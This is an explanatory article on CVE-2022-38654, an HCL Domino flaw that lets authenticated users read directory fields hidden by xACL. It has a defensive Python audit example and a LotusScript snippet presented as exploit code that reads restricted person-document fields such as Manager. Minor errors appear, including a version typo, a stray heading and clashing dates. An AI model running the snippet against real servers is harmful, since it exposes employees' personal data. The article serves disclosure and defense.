HCL Domino, formerly known as IBM Domino or Lotus Notes, is one of the corporate world’s most popular email, collaboration, and application servers. In September 2022, HCL released a security advisory for a critical information disclosure vulnerability identified as CVE-2022-38654. This flaw has wide-reaching implications for organizations still running Domino, opening the door to potential leaks of sensitive user information—even when strict database security measures are in place.

In this article, we break down what the flaw is and how it works, walk through some exploit concepts, and provide links to the key references.

What is CVE-2022-38654?

CVE-2022-38654 is an information disclosure vulnerability. Specifically, in HCL Domino, certain local server calls may ignore directory read restrictions configured through xACL, the Extended Access Control List mechanism that is meant to govern who can access particular records in the Domino directory.

This means that, even if xACL is set up to restrict access, an authenticated attacker able to make specific internal API calls can retrieve user details that would otherwise remain hidden.

HCL advisory:
https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0097321

“xACL” – The Gatekeeper That Fumbled

xACL (Extended ACL) lets Domino administrators tightly control who can read or write information—down to precise user groups, roles, fields, and records. It is mainly used to protect directory data from unauthorized access.

For example, you could use an xACL rule to *hide* the “Manager” field of a user's person document from everyone except HR. In theory, any lookup on the Domino directory should respect these rules.

But with CVE-2022-38654, local server calls made by certain APIs or commands can *skip* xACL checks. The result: data you thought was locked away can be easily accessed by someone with authenticated server access.
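To make "any lookup should respect these rules" checkable, here is an added example (not HCL's code or the advisory's) that models xACL attribute-read rules as hierarchical, most-specific-wins entries and audits a lookup result against them, flagging every field a caller received that the rules do not grant. The rule notation, the `ALL` marker and the sample policy are assumptions constructed for the example.

```python
# Added example (not HCL's code or the advisory's): a simplified model of xACL
# attribute-read rules plus an audit that flags directory fields a lookup returned
# to a caller beyond what those rules allow. Notation and semantics are assumptions.
from dataclasses import dataclass
ALL = "*"  # assumed marker for "every attribute" / "every subject"

@dataclass(frozen=True)
class XaclRule:
    target: str          # "/" (whole directory), "/O=Acme", "/OU=Sales/O=Acme", ...
    subject: str         # a user or group name, or ALL
    readable: frozenset  # attribute names the subject may read, or {ALL}

def _parts(name: str) -> list:
    """Split 'CN=John Doe/OU=Sales/O=Acme' or '/OU=Sales/O=Acme' into components."""
    return [p for p in name.split("/") if p]

def _matches(target: str, entry: str) -> bool:
    """A target applies to an entry when its components form the entry's tail."""
    t, e = _parts(target), _parts(entry)
    return len(t) <= len(e) and e[len(e) - len(t):] == t

def effective_readable(rules, subject, groups, entry) -> frozenset:
    """Most-specific matching target wins; at equal depth a rule naming the caller
    or one of its groups beats an everyone (ALL) rule. No matching rule: nothing."""
    names = {subject, *groups}
    best, best_key = frozenset(), (-1, -1)
    for r in rules:
        if not _matches(r.target, entry):
            continue
        if r.subject in names:
            key = (len(_parts(r.target)), 1)
        elif r.subject == ALL:
            key = (len(_parts(r.target)), 0)
        else:
            continue
        if key > best_key:
            best, best_key = r.readable, key
    return best

def audit_lookup(rules, subject, groups, entry, returned_fields) -> list:
    """Fields the server returned that the rules do not let the caller read.
    Empty means the lookup honoured xACL; anything else is a bypass to investigate."""
    allowed = effective_readable(rules, subject, groups, entry)
    return [] if ALL in allowed else sorted(f for f in returned_fields if f not in allowed)

# Constructed sample policy: everyone reads name and mail anywhere; only the HR group
# reads Manager and HomeAddress under /O=Acme. Then a constructed non-HR lookup result.
RULES = [XaclRule("/", ALL, frozenset({"FullName", "InternetAddress"})),
         XaclRule("/O=Acme", "HR", frozenset({"FullName", "InternetAddress", "Manager", "HomeAddress"}))]
RETURNED = {"FullName": "John Doe", "InternetAddress": "jdoe@acme.example", "Manager": "CN=Jane Roe/O=Acme"}
```

Feed it the fields an actual lookup returned for a low-privileged account, both through LDAP and through a local agent, before and after patching; a non-empty result on a patched server means some path is still skipping xACL.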

Any user with at least some authenticated access

> This is an *authenticated* vulnerability. You still need a valid user session—anonymous or guest access will not work. But with even low-privilege valid access, an attacker can potentially query for information that should be hidden.

How Does the Exploit Work?

The exploit leverages a logic flaw in certain Domino APIs, such as LDAP, NRPC, or internal server calls, which do not always check for xACL permissions when running local searches.

Let’s look at a generic exploitation scenario:

1. Attacker gets authenticated access, either as a regular user or via a low-privileged service account.
2. Using a script or direct API call, the attacker issues a “search” request to the Domino directory with crafted filters.
3. If the system is vulnerable, Domino returns user attributes—even if those fields are hidden by xACL rules.

Example Exploit Code

Below is a basic LotusScript snippet showing how an attacker might attempt to access restricted attributes of user records via an agent running on the server.

```lotusscript
Sub Initialize
    Dim session As New NotesSession
    Dim db As NotesDatabase
    Dim directoryView As NotesView
    Dim personDoc As NotesDocument
    Dim searchString As String

    ' Open the Domino Directory on the server the agent runs against
    ' (replace "your_server_here" with the server's name)
    Set db = session.GetDatabase("your_server_here", "names.nsf")

    ' Look up a person document by full name in the People view (ignoring xACL!)
    Set directoryView = db.GetView("People")
    searchString = "John Doe"
    Set personDoc = directoryView.GetDocumentByKey(searchString, True)

    If Not personDoc Is Nothing Then
        ' Reveals restricted fields! Item values are arrays, so element 0 is read.
        ' Person documents keep the mail address in the InternetAddress item.
        Print "Name: " & personDoc.FullName(0)
        Print "Email: " & personDoc.InternetAddress(0)
        Print "Manager: " & personDoc.Manager(0) ' May be restricted!
    End If
End Sub
```

> This script, when executed by a user with *any* authenticated access, may return fields that are protected under xACL. Even though the “Manager” field, for instance, is supposed to be hidden, the exploit allows it to be retrieved.

Imagine

- A disgruntled employee with basic Domino access writes a small script or uses standard Domino tools to enumerate user records.
- They retrieve attributes like home address, phone numbers, title, or custom HR fields—data no one outside of designated roles should see.

Fixes and Workarounds

HCL released a hotfix and subsequent update to patch CVE-2022-38654. The solution involves ensuring all local calls and APIs fully respect xACL permissions.

- Upgrade your Domino server to the latest supported version.
- Apply any available hotfixes immediately.

HCL patch guidance:
- HCL KB Article
- HCL Domino 12..2 FP2 - Security Update Details

Additional References

- US National Vulnerability Database: CVE-2022-38654
- HCL Domino Security Updates
- Understanding xACL Security

Summary

CVE-2022-38654 is a stark reminder that even trusted access control mechanisms can fail in complex enterprise software. If you rely on xACLs in your HCL Domino infrastructure, review your server versions, apply patches, and regularly audit who can see what—before an insider or determined attacker does.

Stay patched, stay secure.

*This guide is exclusive and designed for clarity. Please share and cite the original sources for best security practices.*

Timeline

Published on: 11/04/2022 21:15:00 UTC
Last modified on: 11/07/2022 17:15:00 UTC